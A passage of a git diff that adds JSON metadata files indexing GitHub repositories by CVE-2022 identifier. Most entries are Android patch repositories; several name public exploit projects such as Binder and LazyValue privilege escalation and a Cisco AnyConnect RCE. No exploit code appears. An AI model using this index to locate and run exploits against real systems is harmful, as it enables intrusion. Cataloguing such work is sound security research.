"https:\/\/github.com\/ShaikUsaf\/system_bt_AOSP10_r33_CVE-2022-20229", + "description": null, + "fork": false, + "created_at": "2022-08-18T07:02:43Z", + "updated_at": "2022-10-11T16:09:15Z", + "pushed_at": "2022-08-18T07:07:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20338.json b/2022/CVE-2022-20338.json new file mode 100644 index 0000000000..89a5cce88d --- /dev/null +++ b/2022/CVE-2022-20338.json @@ -0,0 +1,95 @@ +[ + { + "id": 718530988, + "name": "frameworks_base_AOSP_06_r22_CVE-2022-20338", + "full_name": "Satheesh575555\/frameworks_base_AOSP_06_r22_CVE-2022-20338", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP_06_r22_CVE-2022-20338", + "description": null, + "fork": false, + "created_at": "2023-11-14T09:21:58Z", + "updated_at": "2023-11-14T10:03:13Z", + "pushed_at": "2023-11-14T09:44:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720348499, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20338", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20338", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20338", + "description": null, + "fork": false, + "created_at": "2023-11-18T07:44:41Z", + "updated_at": "2023-11-18T07:44:41Z", + "pushed_at": "2023-11-18T07:44:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720410510, + "name": "frameworks_base_AOSP_10_r33_CVE-2022-20338", + "full_name": "Trinadh465\/frameworks_base_AOSP_10_r33_CVE-2022-20338", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP_10_r33_CVE-2022-20338", + "description": null, + "fork": false, + "created_at": "2023-11-18T12:02:22Z", + "updated_at": "2023-11-18T12:45:06Z", + "pushed_at": "2023-11-18T13:52:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20347.json b/2022/CVE-2022-20347.json new file mode 100644 index 0000000000..c6386c941b --- /dev/null +++ b/2022/CVE-2022-20347.json @@ -0,0 +1,95 @@ +[ + { + "id": 536559328, + "name": "packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "full_name": "ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "description": null, + "fork": false, + "created_at": "2022-09-14T12:06:24Z", + "updated_at": "2022-09-15T01:06:38Z", + "pushed_at": "2022-09-14T12:06:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 537400803, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2022-20347", + "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2022-20347", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2022-20347", + "description": null, + "fork": false, + "created_at": "2022-09-16T09:59:04Z", + "updated_at": "2022-09-16T09:59:04Z", + "pushed_at": "2022-09-16T09:59:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624363447, + "name": "platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "full_name": "hshivhare67\/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "description": null, + "fork": false, + "created_at": "2023-04-06T09:54:28Z", + "updated_at": "2023-04-06T10:32:43Z", + "pushed_at": "2023-04-07T03:29:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20360.json b/2022/CVE-2022-20360.json new file mode 100644 index 0000000000..9951fda4f6 --- /dev/null +++ b/2022/CVE-2022-20360.json @@ -0,0 +1,33 @@ +[ + { + "id": 645233752, + "name": "packages_apps_Settings_AOSP_10_r33_CVE-2022-20360", + "full_name": "726232111\/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360", + "owner": { + "login": "726232111", + "id": 34729943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34729943?v=4", + "html_url": "https:\/\/github.com\/726232111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/726232111\/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360", + "description": null, + "fork": false, + "created_at": "2023-05-25T07:56:24Z", + "updated_at": "2023-05-25T07:56:24Z", + "pushed_at": "2022-09-09T07:35:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20361.json b/2022/CVE-2022-20361.json new file mode 100644 index 0000000000..febc0f3e81 --- /dev/null +++ b/2022/CVE-2022-20361.json @@ -0,0 +1,38 @@ +[ + { + "id": 525921405, + "name": "blur", + "full_name": "francozappa\/blur", + "owner": { + "login": "francozappa", + "id": 4628017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4628017?v=4", + "html_url": "https:\/\/github.com\/francozappa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/francozappa\/blur", + "description": "BLURtooth: Exploiting Cross-Transport Key Derivation in Bluetooth Classic and Bluetooth Low Energy [CVE-2020-15802] [CVE-2022-20361]", + "fork": false, + "created_at": "2022-08-17T19:05:38Z", + "updated_at": "2024-11-22T02:56:40Z", + "pushed_at": "2022-08-17T19:20:34Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bluetooth", + "bluetooth-le", + "bluetooth-low-energy", + "ctkd" + ], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20409.json b/2022/CVE-2022-20409.json new file mode 100644 index 0000000000..bce9a3ef07 --- /dev/null +++ b/2022/CVE-2022-20409.json @@ -0,0 +1,37 @@ +[ + { + "id": 569017471, + "name": "bad_io_uring", + "full_name": "Markakd\/bad_io_uring", + "owner": { + "login": "Markakd", + "id": 18663141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18663141?v=4", + "html_url": "https:\/\/github.com\/Markakd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Markakd\/bad_io_uring", + "description": "Android kernel exploitation for CVE-2022-20409", + "fork": false, + "created_at": "2022-11-21T22:42:50Z", + "updated_at": "2024-11-26T02:59:31Z", + "pushed_at": "2024-10-17T16:26:39Z", + "stargazers_count": 161, + "watchers_count": 161, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android-exploitation", + "android-root", + "kernel-exploitation" + ], + "visibility": "public", + "forks": 24, + "watchers": 161, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20413.json b/2022/CVE-2022-20413.json new file mode 100644 index 0000000000..7881fd520b --- /dev/null +++ b/2022/CVE-2022-20413.json @@ -0,0 +1,33 @@ +[ + { + "id": 589955117, + "name": "frameworks_av-r33_CVE-2022-20413", + "full_name": "pazhanivel07\/frameworks_av-r33_CVE-2022-20413", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_av-r33_CVE-2022-20413", + "description": null, + "fork": false, + "created_at": "2023-01-17T10:33:22Z", + "updated_at": "2023-03-23T01:13:28Z", + "pushed_at": "2023-01-17T11:20:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20421.json b/2022/CVE-2022-20421.json new file mode 100644 index 0000000000..e2aa2952ed --- /dev/null +++ b/2022/CVE-2022-20421.json @@ -0,0 +1,33 @@ +[ + { + "id": 617890338, + "name": "badspin", + "full_name": "0xkol\/badspin", + "owner": { + "login": "0xkol", + "id": 58270928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58270928?v=4", + "html_url": "https:\/\/github.com\/0xkol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xkol\/badspin", + "description": "Bad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)", + "fork": false, + "created_at": "2023-03-23T10:25:59Z", + "updated_at": "2024-11-16T02:50:35Z", + "pushed_at": "2023-05-27T15:39:41Z", + "stargazers_count": 232, + "watchers_count": 232, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 232, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20452.json b/2022/CVE-2022-20452.json new file mode 100644 index 0000000000..2c8f279af4 --- /dev/null +++ b/2022/CVE-2022-20452.json @@ -0,0 +1,33 @@ +[ + { + "id": 587387036, + "name": "LeakValue", + "full_name": "michalbednarski\/LeakValue", + "owner": { + "login": "michalbednarski", + "id": 1826899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1826899?v=4", + "html_url": "https:\/\/github.com\/michalbednarski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michalbednarski\/LeakValue", + "description": "Exploit for CVE-2022-20452, privilege escalation on Android from installed app to system app (or another app) via LazyValue using Parcel after recycle()", + "fork": false, + "created_at": "2023-01-10T16:24:51Z", + "updated_at": "2024-11-20T03:08:56Z", + "pushed_at": "2023-04-12T17:28:49Z", + "stargazers_count": 279, + "watchers_count": 279, + "has_discussions": false, + "forks_count": 51, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 51, + "watchers": 279, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20456.json b/2022/CVE-2022-20456.json new file mode 100644 index 0000000000..8cbb35dd43 --- /dev/null +++ b/2022/CVE-2022-20456.json @@ -0,0 +1,33 @@ +[ + { + "id": 647688194, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20456", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20456", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20456", + "description": null, + "fork": false, + "created_at": "2023-05-31T10:07:10Z", + "updated_at": "2023-05-31T10:15:36Z", + "pushed_at": "2023-05-31T10:13:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20470.json b/2022/CVE-2022-20470.json new file mode 100644 index 0000000000..a0f558fc0f --- /dev/null +++ b/2022/CVE-2022-20470.json @@ -0,0 +1,33 @@ +[ + { + "id": 584611982, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20470", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20470", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20470", + "description": null, + "fork": false, + "created_at": "2023-01-03T03:54:59Z", + "updated_at": "2023-03-27T01:47:22Z", + "pushed_at": "2023-01-03T04:01:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20473.json b/2022/CVE-2022-20473.json new file mode 100644 index 0000000000..86eab365e6 --- /dev/null +++ b/2022/CVE-2022-20473.json @@ -0,0 +1,64 @@ +[ + { + "id": 584289667, + "name": "frameworks_minikin_AOSP10_r33_CVE-2022-20473", + "full_name": "Trinadh465\/frameworks_minikin_AOSP10_r33_CVE-2022-20473", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_minikin_AOSP10_r33_CVE-2022-20473", + "description": null, + "fork": false, + "created_at": "2023-01-02T05:55:37Z", + "updated_at": "2023-01-02T05:55:37Z", + "pushed_at": null, + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 584624006, + "name": "frameworks_minikin_AOSP10_r33-CVE-2022-20473", + "full_name": "Trinadh465\/frameworks_minikin_AOSP10_r33-CVE-2022-20473", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_minikin_AOSP10_r33-CVE-2022-20473", + "description": null, + "fork": false, + "created_at": "2023-01-03T04:51:12Z", + "updated_at": "2023-01-03T04:53:10Z", + "pushed_at": "2023-01-03T04:53:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20474.json b/2022/CVE-2022-20474.json new file mode 100644 index 0000000000..eca714b292 --- /dev/null +++ b/2022/CVE-2022-20474.json @@ -0,0 +1,33 @@ +[ + { + "id": 888350695, + "name": "CVE-2022-20474", + "full_name": "cxxsheng\/CVE-2022-20474", + "owner": { + "login": "cxxsheng", + "id": 15044840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15044840?v=4", + "html_url": "https:\/\/github.com\/cxxsheng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cxxsheng\/CVE-2022-20474", + "description": "PoC of CVE-2022-20474", + "fork": false, + "created_at": "2024-11-14T08:48:59Z", + "updated_at": "2024-11-18T08:29:54Z", + "pushed_at": "2024-11-16T08:00:49Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20489.json b/2022/CVE-2022-20489.json new file mode 100644 index 0000000000..d33bb69681 --- /dev/null +++ b/2022/CVE-2022-20489.json @@ -0,0 +1,64 @@ +[ + { + "id": 647715589, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old", + "description": null, + "fork": false, + "created_at": "2023-05-31T11:22:01Z", + "updated_at": "2023-05-31T11:56:29Z", + "pushed_at": "2023-05-31T11:55:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 647728712, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20489", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489", + "description": null, + "fork": false, + "created_at": "2023-05-31T11:56:48Z", + "updated_at": "2023-05-31T12:05:37Z", + "pushed_at": "2023-05-31T12:03:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20490.json b/2022/CVE-2022-20490.json new file mode 100644 index 0000000000..b58aea06c9 --- /dev/null +++ b/2022/CVE-2022-20490.json @@ -0,0 +1,33 @@ +[ + { + "id": 647702001, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20490", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20490", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20490", + "description": null, + "fork": false, + "created_at": "2023-05-31T10:45:35Z", + "updated_at": "2023-05-31T10:52:34Z", + "pushed_at": "2023-05-31T10:51:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20492.json b/2022/CVE-2022-20492.json new file mode 100644 index 0000000000..d6d69c2cfe --- /dev/null +++ b/2022/CVE-2022-20492.json @@ -0,0 +1,33 @@ +[ + { + "id": 647620143, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20492", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20492", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20492", + "description": null, + "fork": false, + "created_at": "2023-05-31T07:07:40Z", + "updated_at": "2023-05-31T07:12:57Z", + "pushed_at": "2023-05-31T09:59:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20493.json b/2022/CVE-2022-20493.json new file mode 100644 index 0000000000..2c54f2b1e2 --- /dev/null +++ b/2022/CVE-2022-20493.json @@ -0,0 +1,33 @@ +[ + { + "id": 647669098, + "name": "frameworks_base_CVE-2022-20493", + "full_name": "Trinadh465\/frameworks_base_CVE-2022-20493", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_CVE-2022-20493", + "description": null, + "fork": false, + "created_at": "2023-05-31T09:18:01Z", + "updated_at": "2023-05-31T09:25:13Z", + "pushed_at": "2023-05-31T09:24:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20494.json b/2022/CVE-2022-20494.json new file mode 100644 index 0000000000..44698e0861 --- /dev/null +++ b/2022/CVE-2022-20494.json @@ -0,0 +1,33 @@ +[ + { + "id": 609257730, + "name": "CVE-2022-20494", + "full_name": "Supersonic\/CVE-2022-20494", + "owner": { + "login": "Supersonic", + "id": 36431699, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36431699?v=4", + "html_url": "https:\/\/github.com\/Supersonic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Supersonic\/CVE-2022-20494", + "description": "Exploit app for CVE-2022-20494, a high severity permanent denial-of-service vulnerability that leverages Android's DND (Do not disturb) feature", + "fork": false, + "created_at": "2023-03-03T17:54:34Z", + "updated_at": "2024-09-15T04:50:07Z", + "pushed_at": "2023-03-03T18:11:07Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20607.json b/2022/CVE-2022-20607.json new file mode 100644 index 0000000000..539e94138a --- /dev/null +++ b/2022/CVE-2022-20607.json @@ -0,0 +1,33 @@ +[ + { + "id": 598379401, + "name": "CVE-2022-20607", + "full_name": "sumeetIT\/CVE-2022-20607", + "owner": { + "login": "sumeetIT", + "id": 54736912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54736912?v=4", + "html_url": "https:\/\/github.com\/sumeetIT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sumeetIT\/CVE-2022-20607", + "description": "In the Pixel cellular firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238914868References: N\/A CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-02-07T01:28:29Z", + "updated_at": "2023-02-20T12:01:39Z", + "pushed_at": "2022-12-27T12:10:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20699.json b/2022/CVE-2022-20699.json new file mode 100644 index 0000000000..ec4aaf2a2a --- /dev/null +++ b/2022/CVE-2022-20699.json @@ -0,0 +1,95 @@ +[ + { + "id": 456573106, + "name": "CVE-2022-20699", + "full_name": "Audiobahn\/CVE-2022-20699", + "owner": { + "login": "Audiobahn", + "id": 98435709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98435709?v=4", + "html_url": "https:\/\/github.com\/Audiobahn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Audiobahn\/CVE-2022-20699", + "description": "Cisco Anyconnect VPN unauth RCE (rwx stack)", + "fork": false, + "created_at": "2022-02-07T15:53:21Z", + "updated_at": "2024-11-26T06:21:11Z", + "pushed_at": "2022-02-07T15:55:03Z", + "stargazers_count": 239, + "watchers_count": 239, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 239, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 457817909, + "name": "CVE-2022-20699", + "full_name": "puckiestyle\/CVE-2022-20699", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2022-20699", + "description": null, + "fork": false, + "created_at": "2022-02-10T14:40:25Z", + "updated_at": "2022-02-10T14:40:40Z", + "pushed_at": "2022-02-10T14:40:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 459040811, + "name": "CVE-2022-20699", + "full_name": "rohan-flutterint\/CVE-2022-20699", + "owner": { + "login": "rohan-flutterint", + "id": 82864904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82864904?v=4", + "html_url": "https:\/\/github.com\/rohan-flutterint", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rohan-flutterint\/CVE-2022-20699", + "description": null, + "fork": false, + "created_at": "2022-02-14T06:23:06Z", + "updated_at": "2022-11-05T15:57:52Z", + "pushed_at": "2022-02-14T06:23:14Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2078.json b/2022/CVE-2022-2078.json new file mode 100644 index 0000000000..857ec06808 --- /dev/null +++ b/2022/CVE-2022-2078.json @@ -0,0 +1,33 @@ +[ + { + "id": 610271448, + "name": "CVE-2022-2078", + "full_name": "delsploit\/CVE-2022-2078", + "owner": { + "login": "delsploit", + "id": 127108998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4", + "html_url": "https:\/\/github.com\/delsploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delsploit\/CVE-2022-2078", + "description": null, + "fork": false, + "created_at": "2023-03-06T12:49:29Z", + "updated_at": "2023-08-07T10:26:59Z", + "pushed_at": 